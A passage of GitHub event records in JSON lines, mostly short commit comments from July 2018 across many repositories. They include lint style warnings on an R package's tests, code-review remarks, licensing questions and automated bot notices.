^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:379:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L379) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\"), c(\"1\", \"20\", \"45\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:385:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L385) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(10L, \"20\"), \"01020\")\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:386:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L386) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V10\", c(\"0\", \"1\")), c(\"V100\", \"V101\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:387:16:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-convert.R#L387) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-util.R:46:20:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-util.R#L46) *style:* **Variable and function names should be all lowercase.**\n```r\n​                   trimCpp(c(\"123\", \" a s d f \")))\n                   ^~~~~~~\n```\n[tests/testthat/test-util.R:65:40:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-util.R#L65) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_identical(strim(\" a s d f \"), strimCpp(\" a s d f \"))\n                                       ^~~~~~~~\n```\n[tests/testthat/test-util.R:142:9:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-util.R#L142) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rs <- icd9RandomShort(1000)\n        ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-valid.R:504:8:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-valid.R#L504) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortN(100)\n       ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-valid.R:509:8:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-valid.R#L509) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortV(100)\n       ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-valid.R:514:8:](https://github.com/jackwasey/icd/blob/15e35c3f7e7d5dd4c31acf07a95c4a6458b6cf37/tests/testthat/test-valid.R#L514) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortE(100)\n       ^~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-20T01:42:36Z"}
{"id":"7992476307","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/cadquery-feedstock"},"payload":{"comment":{"id":29773015,"position":null,"line":null,"path":null,"commit_id":"36d38c4a3b0789b5103f0f5984271e772d4abfec","created_at":"2018-07-20T01:42:46Z","updated_at":"2018-07-20T01:42:46Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @bollwyvl were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T01:42:46Z"}
{"id":"7992477007","type":"CommitCommentEvent","actor":{"login":"ricksolaris"},"repo":{"name":"LouPlus/jobplus7-15"},"payload":{"comment":{"id":29773021,"position":null,"line":null,"path":null,"commit_id":"ca9bf6ef6655196309e6c6817dbc4286dd46e2ee","created_at":"2018-07-20T01:43:03Z","updated_at":"2018-07-20T01:43:03Z","author_association":"COLLABORATOR","body":"以战养战(https://github.com/ricksolaris)"}},"created_at":"2018-07-20T01:43:03Z"}
{"id":"7992477854","type":"CommitCommentEvent","actor":{"login":"tannerflick4"},"repo":{"name":"Altemio/SevenKingdoms-master"},"payload":{"comment":{"id":29773024,"position":null,"line":null,"path":null,"commit_id":"259bb284a2517d0f80f43a827038a2500747da46","created_at":"2018-07-20T01:43:24Z","updated_at":"2018-07-20T01:43:24Z","author_association":"COLLABORATOR","body":"Why do we keep trying to reduce levies? IMO its okay to have alot of them..."}},"created_at":"2018-07-20T01:43:24Z"}
{"id":"7992482280","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29773045,"position":null,"line":null,"path":null,"commit_id":"ed13a0dc8a8ba61ca49c7f6dc438719727fce1c0","created_at":"2018-07-20T01:45:15Z","updated_at":"2018-07-20T01:45:15Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-849](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-849).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-849-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-20T01:45:15Z"}
{"id":"7992485551","type":"CommitCommentEvent","actor":{"login":"InsiyaHakim"},"repo":{"name":"Codingdojo-Trey/Debugging-jQuery"},"payload":{"comment":{"id":29773056,"position":8,"line":8,"path":"debugging_jquery.html","commit_id":"d28162cb7f83d8093bc952b6f75e071e29d58a17","created_at":"2018-07-20T01:46:37Z","updated_at":"2018-07-20T01:46:37Z","author_association":"NONE","body":"error\r\n"}},"created_at":"2018-07-20T01:46:37Z"}
{"id":"7992492680","type":"CommitCommentEvent","actor":{"login":"InsiyaHakim"},"repo":{"name":"Codingdojo-Trey/Debugging-jQuery"},"payload":{"comment":{"id":29773069,"position":27,"line":25,"path":"debugging_jquery.html","commit_id":"d28162cb7f83d8093bc952b6f75e071e29d58a17","created_at":"2018-07-20T01:49:39Z","updated_at":"2018-07-20T01:49:39Z","author_association":"NONE","body":"error\r\n"}},"created_at":"2018-07-20T01:49:39Z"}
{"id":"7992493962","type":"CommitCommentEvent","actor":{"login":"checkmarxQA"},"repo":{"name":"checkmarxQA/CxRepository"},"payload":{"comment":{"id":29773071,"position":null,"line":null,"path":null,"commit_id":"a23cad998261c81bf63aa21ac681a2e8b5303e7c","created_at":"2018-07-20T01:50:12Z","updated_at":"2018-07-20T01:50:12Z","author_association":"OWNER","body":"The scan failed.\r\n<b>Included commits</b><table><tr><th>Commit ID</th><th>Owner</th></tr><tr><td><a href=\"https://github.com/checkmarxQA/CxRepository/commit/a23cad998261c81bf63aa21ac681a2e8b5303e7c\">a23cad998261c81bf63aa21ac681a2e8b5303e7c</a></td><td>@web-flow</td></tr></table>\r\n"}},"created_at":"2018-07-20T01:50:12Z"}
{"id":"7992494732","type":"CommitCommentEvent","actor":{"login":"ricksolaris"},"repo":{"name":"LouPlus/jobplus7-15"},"payload":{"comment":{"id":29773072,"position":null,"line":null,"path":null,"commit_id":"905f2fb3d5a52a6d1669ea446942afd8c2b8663f","created_at":"2018-07-20T01:50:31Z","updated_at":"2018-07-20T01:50:31Z","author_association":"COLLABORATOR","body":"* [以战养战](https://github.com/ricksolaris)"}},"created_at":"2018-07-20T01:50:31Z"}
{"id":"7992513138","type":"CommitCommentEvent","actor":{"login":"PabloJ22"},"repo":{"name":"UTCBC-Team5/Project1"},"payload":{"comment":{"id":29773107,"position":null,"line":null,"path":null,"commit_id":"88b0ec1a91e25f5141cd02175af2651b2470366a","created_at":"2018-07-20T01:57:45Z","updated_at":"2018-07-20T01:57:45Z","author_association":"COLLABORATOR","body":"merge test "}},"created_at":"2018-07-20T01:57:45Z"}
{"id":"7992514190","type":"CommitCommentEvent","actor":{"login":"hellomc"},"repo":{"name":"hellomc/csci-112"},"payload":{"comment":{"id":29773112,"position":null,"line":null,"path":null,"commit_id":"7f7fbee8025b0ebb0dcfb7afde268b0131506262","created_at":"2018-07-20T01:58:10Z","updated_at":"2018-07-20T01:58:10Z","author_association":"OWNER","body":"I mean checking a and x values"}},"created_at":"2018-07-20T01:58:10Z"}
{"id":"7992516387","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29773115,"position":null,"line":null,"path":null,"commit_id":"672b29135a124fa959b3b2c39af88d746c718f57","created_at":"2018-07-20T01:59:04Z","updated_at":"2018-07-20T01:59:04Z","author_association":"OWNER","body":"Created multidev environment [tre#ci-64](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#ci-64).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-64-tre.pantheonsite.io/)"}},"created_at":"2018-07-20T01:59:04Z"}
{"id":"7994089909","type":"CommitCommentEvent","actor":{"login":"drdanz"},"repo":{"name":"robotology/yarp"},"payload":{"comment":{"id":29776844,"position":5,"line":5,"path":"bindings/lua/tests/test_vocab.lua","commit_id":"7aa99d95eb5f3f2b6692aced7afa1732a1cd467c","created_at":"2018-07-20T10:00:06Z","updated_at":"2018-07-20T10:00:06Z","author_association":"MEMBER","body":"@jgvictores I just noticed you licensed this as LGPLv2.1, but the \"standard\" license for YARP libraries, examples and tests is now BSD. Do you anything against re-licensing this to BSD?"}},"created_at":"2018-07-20T10:00:06Z"}
{"id":"7994090342","type":"CommitCommentEvent","actor":{"login":"ziggamon"},"repo":{"name":"bitrefill/airfill-widget"},"payload":{"comment":{"id":29776846,"position":7,"line":19,"path":"src/components/Order/PaymentError.js","commit_id":"f8e2f9c2add9368a04fe547fb5342d08a78809ea","created_at":"2018-07-20T10:00:11Z","updated_at":"2018-07-20T10:00:11Z","author_association":"NONE","body":"Guessing this line may have introduced the bug?"}},"created_at":"2018-07-20T10:00:11Z"}
{"id":"7994093385","type":"CommitCommentEvent","actor":{"login":"lihuihui123456"},"repo":{"name":"lihuihui123456/test1"},"payload":{"comment":{"id":29776859,"position":4,"line":4,"path":"src/main/java/test.java","commit_id":"2ba81583bcc9d1b211e359938317bcef8127c180","created_at":"2018-07-20T10:00:44Z","updated_at":"2018-07-20T10:00:44Z","author_association":"OWNER","body":"111"}},"created_at":"2018-07-20T10:00:44Z"}
{"id":"7994094412","type":"CommitCommentEvent","actor":{"login":"lihuihui123456"},"repo":{"name":"lihuihui123456/test1"},"payload":{"comment":{"id":29776865,"position":null,"line":null,"path":null,"commit_id":"2ba81583bcc9d1b211e359938317bcef8127c180","created_at":"2018-07-20T10:00:57Z","updated_at":"2018-07-20T10:00:57Z","author_association":"OWNER","body":"11"}},"created_at":"2018-07-20T10:00:57Z"}
{"id":"7994101089","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29776876,"position":109,"line":109,"path":"subprojects/docs/src/docs/userguide/find_bugs_plugin.adoc","commit_id":"b29c3c20fb80bfed6af799fb7b2d293f593ec85d","created_at":"2018-07-20T10:02:19Z","updated_at":"2018-07-20T10:02:19Z","author_association":"CONTRIBUTOR","body":"Did you mean to delete this one? It's not listed in the issue description."}},"created_at":"2018-07-20T10:02:19Z"}
{"id":"7994101374","type":"CommitCommentEvent","actor":{"login":"ProudHuang"},"repo":{"name":"ProudHuang/myCodeWarehouse"},"payload":{"comment":{"id":29776877,"position":null,"line":null,"path":null,"commit_id":"f9bece17dce8eff21b0c0d42b6f8a7ae0c7ceaea","created_at":"2018-07-20T10:02:23Z","updated_at":"2018-07-20T10:02:23Z","author_association":"OWNER","body":"[黄俊豪（试题）-15515168119.zip](https://github.com/ProudHuang/myCodeWarehouse/files/2213406/-15515168119.zip)\r\n"}},"created_at":"2018-07-20T10:02:23Z"}
{"id":"7994101621","type":"CommitCommentEvent","actor":{"login":"DieHertz"},"repo":{"name":"ctzsnooze/betaflight"},"payload":{"comment":{"id":29776879,"position":3,"line":124,"path":"src/main/sensors/gyroanalyse.c","commit_id":"f3022b9ef22163f28c786e3036d00073a77efdc9","created_at":"2018-07-20T10:02:26Z","updated_at":"2018-07-20T10:02:26Z","author_association":"NONE","body":"`static FAST_RAM_ZERO_INIT float fftAcc[XYZ_AXIS_COUNT];` insert here"}},"created_at":"2018-07-20T10:02:26Z"}
{"id":"7994102874","type":"CommitCommentEvent","actor":{"login":"DieHertz"},"repo":{"name":"ctzsnooze/betaflight"},"payload":{"comment":{"id":29776880,"position":16,"line":136,"path":"src/main/sensors/gyroanalyse.c","commit_id":"f3022b9ef22163f28c786e3036d00073a77efdc9","created_at":"2018-07-20T10:02:41Z","updated_at":"2018-07-20T10:02:41Z","author_association":"NONE","body":"Remove this line"}},"created_at":"2018-07-20T10:02:41Z"}
{"id":"7994108594","type":"CommitCommentEvent","actor":{"login":"rbertens"},"repo":{"name":"alisw/AliPhysics"},"payload":{"comment":{"id":29776887,"position":null,"line":null,"path":null,"commit_id":"289a1fbf064a46dd251d15eb1d9e88e1f91be5ab","created_at":"2018-07-20T10:03:47Z","updated_at":"2018-07-20T10:03:47Z","author_association":"CONTRIBUTOR","body":"+1"}},"created_at":"2018-07-20T10:03:47Z"}
{"id":"7994108646","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29776888,"position":109,"line":109,"path":"subprojects/docs/src/docs/userguide/find_bugs_plugin.adoc","commit_id":"b29c3c20fb80bfed6af799fb7b2d293f593ec85d","created_at":"2018-07-20T10:03:48Z","updated_at":"2018-07-20T10:03:48Z","author_association":"CONTRIBUTOR","body":"OK, if anyone else comes across this, the file was renamed to _findbugs_plugin.adoc_."}},"created_at":"2018-07-20T10:03:48Z"}
{"id":"7994109565","type":"CommitCommentEvent","actor":{"login":"yonghyun123"},"repo":{"name":"wlsgussla123/Algorithms"},"payload":{"comment":{"id":29776890,"position":null,"line":null,"path":null,"commit_id":"9ea43a3743a9db81a9f7a18eb7f3f7affc46fa39","created_at":"2018-07-20T10:03:58Z","updated_at":"2018-07-20T10:03:58Z","author_association":"NONE","body":"gone.."}},"created_at":"2018-07-20T10:03:58Z"}
{"id":"7994110849","type":"CommitCommentEvent","actor":{"login":"meets2tarun"},"repo":{"name":"fossasia/meilix-generator"},"payload":{"comment":{"id":29776892,"position":6,"line":23,"path":"static/js/email_noti.js","commit_id":"2e5e425f8f8d8887b17b6902c2416e7d9b44ac5a","created_at":"2018-07-20T10:04:14Z","updated_at":"2018-07-20T10:04:14Z","author_association":"MEMBER","body":"@rpotter12 \r\nThe spelling of background need to be rectified."}},"created_at":"2018-07-20T10:04:14Z"}
{"id":"7994111610","type":"CommitCommentEvent","actor":{"login":"zico404"},"repo":{"name":"zico404/student-s-lodge-finder"},"payload":{"comment":{"id":29776893,"position":null,"line":null,"path":null,"commit_id":"cf5cff586f3f6146e387a8e74c2eb0e72380484f","created_at":"2018-07-20T10:04:23Z","updated_at":"2018-07-20T10:04:23Z","author_association":"OWNER","body":"Let me know if you enc"}},"created_at":"2018-07-20T10:04:23Z"}
{"id":"7994114499","type":"CommitCommentEvent","actor":{"login":"shakeme"},"repo":{"name":"mthenw/docker-frontail"},"payload":{"comment":{"id":29776896,"position":null,"line":null,"path":null,"commit_id":"71f5a412aead7044a5ed35608c1d045219075dda","created_at":"2018-07-20T10:04:59Z","updated_at":"2018-07-20T10:04:59Z","author_association":"NONE","body":"Missing \"for\" in commit message. \"for using wildcards\""}},"created_at":"2018-07-20T10:04:59Z"}
{"id":"7994121219","type":"CommitCommentEvent","actor":{"login":"littlemooon"},"repo":{"name":"bitrefill/airfill-widget"},"payload":{"comment":{"id":29776907,"position":7,"line":19,"path":"src/components/Order/PaymentError.js","commit_id":"f8e2f9c2add9368a04fe547fb5342d08a78809ea","created_at":"2018-07-20T10:06:22Z","updated_at":"2018-07-20T10:06:22Z","author_association":"CONTRIBUTOR","body":"nope, the screenshot is a delivery error not a payment error"}},"created_at":"2018-07-20T10:06:22Z"}
{"id":"7994122130","type":"CommitCommentEvent","actor":{"login":"shakeme"},"repo":{"name":"mthenw/docker-frontail"},"payload":{"comment":{"id":29776908,"position":null,"line":null,"path":null,"commit_id":"71f5a412aead7044a5ed35608c1d045219075dda","created_at":"2018-07-20T10:06:34Z","updated_at":"2018-07-20T10:06:34Z","author_association":"NONE","body":"Should resolve this issue: https://github.com/mthenw/frontail/issues/88"}},"created_at":"2018-07-20T10:06:34Z"}
{"id":"7994122682","type":"CommitCommentEvent","actor":{"login":"DieHertz"},"repo":{"name":"ctzsnooze/betaflight"},"payload":{"comment":{"id":29776909,"position":19,"line":1078,"path":"src/main/sensors/gyro.c","commit_id":"f3022b9ef22163f28c786e3036d00073a77efdc9","created_at":"2018-07-20T10:06:41Z","updated_at":"2018-07-20T10:06:41Z","author_association":"NONE","body":"Here, no `#endif`"}},"created_at":"2018-07-20T10:06:41Z"}
{"id":"7994127171","type":"CommitCommentEvent","actor":{"login":"ipatina"},"repo":{"name":"ipatina/calcite"},"payload":{"comment":{"id":29776920,"position":5,"line":76,"path":"core/src/main/java/org/apache/calcite/sql/fun/SqlMonotonicBinaryOperator.java","commit_id":"890c83b71ae98bdcf5f2396cd378a048d82b2014","created_at":"2018-07-20T10:07:36Z","updated_at":"2018-07-20T10:07:36Z","author_association":"OWNER","body":"Thanks, agreed"}},"created_at":"2018-07-20T10:07:36Z"}
{"id":"7994140364","type":"CommitCommentEvent","actor":{"login":"jgvictores"},"repo":{"name":"robotology/yarp"},"payload":{"comment":{"id":29776942,"position":5,"line":5,"path":"bindings/lua/tests/test_vocab.lua","commit_id":"7aa99d95eb5f3f2b6692aced7afa1732a1cd467c","created_at":"2018-07-20T10:10:24Z","updated_at":"2018-07-20T10:10:24Z","author_association":"MEMBER","body":"No problem! Feel free to re-license this and any other YARP contribution of mine to BSD."}},"created_at":"2018-07-20T10:10:24Z"}
{"id":"7994149623","type":"CommitCommentEvent","actor":{"login":"javanna"},"repo":{"name":"elastic/elasticsearch"},"payload":{"comment":{"id":29776951,"position":70,"line":35,"path":"client/rest-high-level/build.gradle","commit_id":"4633c96a58318e8d8ee37120e14514ce4f5cb882","created_at":"2018-07-20T10:12:28Z","updated_at":"2018-07-20T10:12:28Z","author_association":"MEMBER","body":"seems like you have backported part of #31825 while backporting this other change. I am not sure how things are not breaking given that the method called is still private in 6.x . Going to backport the rest of my change once I get a green build. There were more deprecated methods (the old ones with headers) so more work was required before being able to backport."}},"created_at":"2018-07-20T10:12:28Z"}
{"id":"7994152877","type":"CommitCommentEvent","actor":{"login":"alex-ab"},"repo":{"name":"alex-ab/genode"},"payload":{"comment":{"id":29776956,"position":null,"line":null,"path":null,"commit_id":"4342ab318ff2b053b7caf3131f1f29ef7bf97e91","created_at":"2018-07-20T10:13:12Z","updated_at":"2018-07-20T10:13:12Z","author_association":"OWNER","body":"@cnuke: please add to your dde_linux branch"}},"created_at":"2018-07-20T10:13:12Z"}
{"id":"7994156988","type":"CommitCommentEvent","actor":{"login":"alex-ab"},"repo":{"name":"alex-ab/genode"},"payload":{"comment":{"id":29776960,"position":null,"line":null,"path":null,"commit_id":"05f8b0348746b342cf81f7d6523987d06e7b0546","created_at":"2018-07-20T10:14:08Z","updated_at":"2018-07-20T10:14:08Z","author_association":"OWNER","body":"@cnuke: please add to your dde_linux branch"}},"created_at":"2018-07-20T10:14:08Z"}
{"id":"7994164542","type":"CommitCommentEvent","actor":{"login":"libaoxu"},"repo":{"name":"libaoxu/axios-service"},"payload":{"comment":{"id":29776968,"position":78,"line":109,"path":"src/index.js","commit_id":"8bf71a0edbd1223ec43e1c0c71525f2727dec391","created_at":"2018-07-20T10:15:43Z","updated_at":"2018-07-20T10:15:43Z","author_association":"OWNER","body":"修改创建实例方式"}},"created_at":"2018-07-20T10:15:43Z"}
{"id":"7994168956","type":"CommitCommentEvent","actor":{"login":"kerastinell"},"repo":{"name":"kerastinell/Derpibooru"},"payload":{"comment":{"id":29776977,"position":null,"line":null,"path":null,"commit_id":"bf9bd2a892297c1cf856e742aa4969c8c50d724e","created_at":"2018-07-20T10:16:41Z","updated_at":"2018-07-20T10:16:41Z","author_association":"OWNER","body":"I noticed that the image lists (Top Scoring & Most Commented) weren't working. As usual, Derpibooru's API has changed. Despite `lists/top_scoring.json` link (which was used by the old code) is still on their [API Docs page](https://derpibooru.org/pages/api), it doesn't work any more. Image list data was moved to the `lists.json` This comment fixes loading of the said image lists."}},"created_at":"2018-07-20T10:16:41Z"}
{"id":"7994225865","type":"CommitCommentEvent","actor":{"login":"ChrisMcKee"},"repo":{"name":"Zonciu/bcrypt.net"},"payload":{"comment":{"id":29777076,"position":null,"line":null,"path":null,"commit_id":"2d6ec8681dc67f7f9ec82c41e70e07d8679d90c0","created_at":"2018-07-20T10:29:16Z","updated_at":"2018-07-20T10:29:16Z","author_association":"NONE","body":"This is now configurable in the main release."}},"created_at":"2018-07-20T10:29:16Z"}
{"id":"7994227847","type":"CommitCommentEvent","actor":{"login":"magonia"},"repo":{"name":"ntt-ns/Soft-Patch-Panel_tools"},"payload":{"comment":{"id":29777079,"position":null,"line":null,"path":null,"commit_id":"71cdcad48f14c0269ebda9e5f0925bdd24bbd22f","created_at":"2018-07-20T10:29:44Z","updated_at":"2018-07-20T10:29:44Z","author_association":"COLLABORATOR","body":"Sorry, this change might be slow.\r\n\r\n<pre>\r\n$ time find /usr/src -name checkpatch.pl | xargs ls -t | head -1\r\n/usr/src/linux-headers-3.13.0-24-generic/scripts/checkpatch.pl\r\n\r\nreal    0m0.100s\r\nuser    0m0.048s\r\nsys     0m0.054s\r\n\r\n$ time locate -l 1 /usr/src/*/checkpatch.pl\r\n/usr/src/linux-headers-3.13.0-24/scripts/checkpatch.pl\r\n\r\nreal    0m0.046s\r\nuser    0m0.044s\r\nsys     0m0.002s\r\n</pre>\r\n\r\nbe patient."}},"created_at":"2018-07-20T10:29:44Z"}
{"id":"7994227900","type":"CommitCommentEvent","actor":{"login":"rodionos"},"repo":{"name":"axibase/atsd-api-python"},"payload":{"comment":{"id":29777081,"position":38,"line":295,"path":"README.md","commit_id":"a97500b7f3033c5c5afe6d9ee58e573dc0b797b1","created_at":"2018-07-20T10:29:44Z","updated_at":"2018-07-20T10:29:44Z","author_association":"CONTRIBUTOR","body":"Entity filter requires an entity name, an array of entity name, an entity group name, or an expression to filter entities."}},"created_at":"2018-07-20T10:29:44Z"}
{"id":"7994229470","type":"CommitCommentEvent","actor":{"login":"robert7"},"repo":{"name":"robert7/quentier"},"payload":{"comment":{"id":29777085,"position":11,"line":11,"path":"src/dialogs/FirstShutdownDialog.cpp","commit_id":"86a9a89be66ee52a435cb565a08bbc14070cdfed","created_at":"2018-07-20T10:30:05Z","updated_at":"2018-07-20T10:30:05Z","author_association":"OWNER","body":"OK. If this is the only text change, then I can doit.\r\n\r\nIf you have more suggestions (as I was not 100% with the texts), then you can merge and adjust the texts."}},"created_at":"2018-07-20T10:30:05Z"}
{"id":"7994231035","type":"CommitCommentEvent","actor":{"login":"rodionos"},"repo":{"name":"axibase/atsd-api-python"},"payload":{"comment":{"id":29777092,"position":39,"line":296,"path":"README.md","commit_id":"a97500b7f3033c5c5afe6d9ee58e573dc0b797b1","created_at":"2018-07-20T10:30:24Z","updated_at":"2018-07-20T10:30:24Z","author_association":"CONTRIBUTOR","body":"Some combination is ambiguos. I have this filter described in better details down in the article."}},"created_at":"2018-07-20T10:30:24Z"}
{"id":"7994232499","type":"CommitCommentEvent","actor":{"login":"rodionos"},"repo":{"name":"axibase/atsd-api-python"},"payload":{"comment":{"id":29777096,"position":49,"line":373,"path":"README.md","commit_id":"a97500b7f3033c5c5afe6d9ee58e573dc0b797b1","created_at":"2018-07-20T10:30:43Z","updated_at":"2018-07-20T10:30:43Z","author_association":"CONTRIBUTOR","body":"Use the same definition for EntityFilter and DateFilter everywhere"}},"created_at":"2018-07-20T10:30:43Z"}
{"id":"7994238388","type":"CommitCommentEvent","actor":{"login":"ShayRubach"},"repo":{"name":"ShayRubach/RockPaperSword"},"payload":{"comment":{"id":29777114,"position":22,"line":285,"path":"app/src/main/java/com/pwnz/www/rockpapersword/model/Board.java","commit_id":"e1fee2a7f358f37062120b7f42c84cdc7faf6bad","created_at":"2018-07-20T10:32:04Z","updated_at":"2018-07-20T10:32:04Z","author_association":"OWNER","body":"please call eliminateSoldier() twice here."}},"created_at":"2018-07-20T10:32:04Z"}
{"id":"7994243976","type":"CommitCommentEvent","actor":{"login":"taimur-akhtar"},"repo":{"name":"farzam-azhar/pms"},"payload":{"comment":{"id":29777122,"position":21,"line":21,"path":"app/controllers/users_controller.rb","commit_id":"bb3d69b2d5029da504de300d30d703a1382ccf02","created_at":"2018-07-20T10:33:16Z","updated_at":"2018-07-20T10:33:16Z","author_association":"NONE","body":"params.require(:user).permit(photo_attributes: [:id, :data ])\r\n\r\nkindly check it out."}},"created_at":"2018-07-20T10:33:16Z"}
{"id":"7994245334","type":"CommitCommentEvent","actor":{"login":"Wyqer"},"repo":{"name":"KillahPotatoes/KP-Ranks"},"payload":{"comment":{"id":29777127,"position":null,"line":null,"path":null,"commit_id":"9e4c0b0757dc2a30fe61c892989bb4f2de8e82c3","created_at":"2018-07-20T10:33:36Z","updated_at":"2018-07-20T10:33:36Z","author_association":"MEMBER","body":"A bypass of the variable request from the object owner, if the delivered arguments from the eventhandler look fine.\r\nIt seems, that the entityKilled eventhandler works mostly fine, but it will need some more testing (especially with some more players in a longer session).\r\nThe known \"issues\" with the killer = killed are possibly only appear at the killed event handler. But as above this is something which needs more testing.\r\nMaybe we can get rid of the whole variable request if it's proven that the entityKilled eventhandler works fine."}},"created_at":"2018-07-20T10:33:36Z"}
{"id":"7994245769","type":"CommitCommentEvent","actor":{"login":"Worsell"},"repo":{"name":"svnayden/htsjdk"},"payload":{"comment":{"id":29777130,"position":20,"line":20,"path":"src/main/java/htsjdk/utils/convertorToDatabase/MainHead.java","commit_id":"73939ca9ce328a21196896fa750fd0334671d63e","created_at":"2018-07-20T10:33:42Z","updated_at":"2018-07-20T10:33:42Z","author_association":"COLLABORATOR","body":"Я пишу @NotNull для IDE, чтобы она выдавала warning на возможные ошибки тут.\r\nЭто никак не связано с nullable"}},"created_at":"2018-07-20T10:33:42Z"}
{"id":"7994245885","type":"CommitCommentEvent","actor":{"login":"jpechane"},"repo":{"name":"debezium/debezium"},"payload":{"comment":{"id":29777131,"position":33,"line":676,"path":"debezium-connector-postgres/src/test/java/io/debezium/connector/postgresql/RecordsStreamProducerIT.java","commit_id":"5325837b7038b1a298831493b0c2e923d52a9840","created_at":"2018-07-20T10:33:43Z","updated_at":"2018-07-20T10:33:43Z","author_association":"CONTRIBUTOR","body":"@gunnarmorling  You should not insert the record into the monitored table. Otherwise it does not prove the heartbeat is inserted when non-monitored events arrive"}},"created_at":"2018-07-20T10:33:43Z"}
{"id":"7994246089","type":"CommitCommentEvent","actor":{"login":"taimur-akhtar"},"repo":{"name":"farzam-azhar/pms"},"payload":{"comment":{"id":29777132,"position":3,"line":3,"path":"app/controllers/users_controller.rb","commit_id":"bb3d69b2d5029da504de300d30d703a1382ccf02","created_at":"2018-07-20T10:33:47Z","updated_at":"2018-07-20T10:33:47Z","author_association":"NONE","body":"if current_user.update(photo_params)\r\n        redirect_to edit_user_registration_path, notice: 'Profile picture is successfully updated'\r\n      else\r\n        redirect_to edit_user_registration_path, alert: 'Some Problem occured while updating Profile Picture.'\r\n      end"}},"created_at":"2018-07-20T10:33:47Z"}
{"id":"7994250921","type":"CommitCommentEvent","actor":{"login":"rim-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29777146,"position":null,"line":null,"path":null,"commit_id":"23d840ddce353b9771415a17e6cd4ea73cbb28a5","created_at":"2018-07-20T10:34:55Z","updated_at":"2018-07-20T10:34:55Z","author_association":"CONTRIBUTOR","body":":+1: "}},"created_at":"2018-07-20T10:34:55Z"}
{"id":"7994250990","type":"CommitCommentEvent","actor":{"login":"Michael-Real"},"repo":{"name":"Michael-Real/Udemy"},"payload":{"comment":{"id":29777147,"position":null,"line":null,"path":null,"commit_id":"880055a557adacfcd0f23048122b6d23dab2021c","created_at":"2018-07-20T10:34:56Z","updated_at":"2018-07-20T10:34:56Z","author_association":"OWNER","body":"Needs node_modules"}},"created_at":"2018-07-20T10:34:56Z"}
{"id":"7994257820","type":"CommitCommentEvent","actor":{"login":"evis"},"repo":{"name":"evis/scala-style-guide-enforce"},"payload":{"comment":{"id":29777155,"position":50,"line":85,"path":"scalastyle_config.xml","commit_id":"2742e17a2474887b33446ebde23a23ea613958fc","created_at":"2018-07-20T10:36:21Z","updated_at":"2018-07-20T10:36:21Z","author_association":"OWNER","body":"thanks, looks reasonable :( \r\n\r\nthis project isn't ready to use yet... but maybe I will find time to make it usable :) "}},"created_at":"2018-07-20T10:36:21Z"}
